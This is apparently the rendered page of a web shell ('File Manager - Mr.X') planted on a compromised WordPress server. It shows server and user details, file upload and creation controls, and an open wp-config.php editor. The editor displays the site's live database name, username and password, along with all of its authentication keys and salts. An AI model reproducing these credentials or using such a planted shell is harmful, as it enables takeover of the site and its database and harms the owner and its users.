🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'websparkit_wp_swzss' ); /** Database username */ define( 'DB_USER', 'websparkit_wp_cyu8i' ); /** Database password */ define( 'DB_PASSWORD', 'zXMR@9d10O$!P#xk' ); /** Database hostname */ define( 'DB_HOST', 'localhost:3306' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'G|4t9x3#|%[Vr6KfGQi%0n~k*/1o-N#*[*027(*&06_#b[+47M&W-4]3]#f(+7y('); define('SECURE_AUTH_KEY', '4j2@W150_W/N91(mk&(%F6~5_H*0k@7fG7)3z9o46@]jQe3Rv3J;11S3s6l1M(fY'); define('LOGGED_IN_KEY', 'I;D2n2+q@+Dox0/I0N;87ZzsH07*l63#12EOl:Nir[SD5+G4)|l1J#17o878%8Iq'); define('NONCE_KEY', '6xz8I@S4Udh700t!2@WK]Y3:4P;9lS0@%DP0|_7d3##1cjp8!n3BJU#b9Qa*)qM8'); define('AUTH_SALT', ']LL1i/-1:@lLRw33av3b5OfDQKPpFk~vK+/x68Dd5a#uEx[[b1f;6L4(74&*4&6~'); define('SECURE_AUTH_SALT', '6y|idTd~p49s35j1BH09-eu3[O_aI2~f:8[ad9PY-vG#d8DMn#3kCdn&4r[43atR'); define('LOGGED_IN_SALT', '@nQ|3a9sn+k&j*e0SW!#!/BkfyFFkkj97_/6015MPUjaX~N6RaXH16;#0~IN[h9X'); define('NONCE_SALT', 'Hy|-r0S&bY_1-5nOeSJ2C9EvAP5eJx4Gd_2JR45eV24XN!/CP3lu-t:1Mo|_6Ge7'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'JG8XK_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Save Changes
Cancel
Create New File
Create New Folder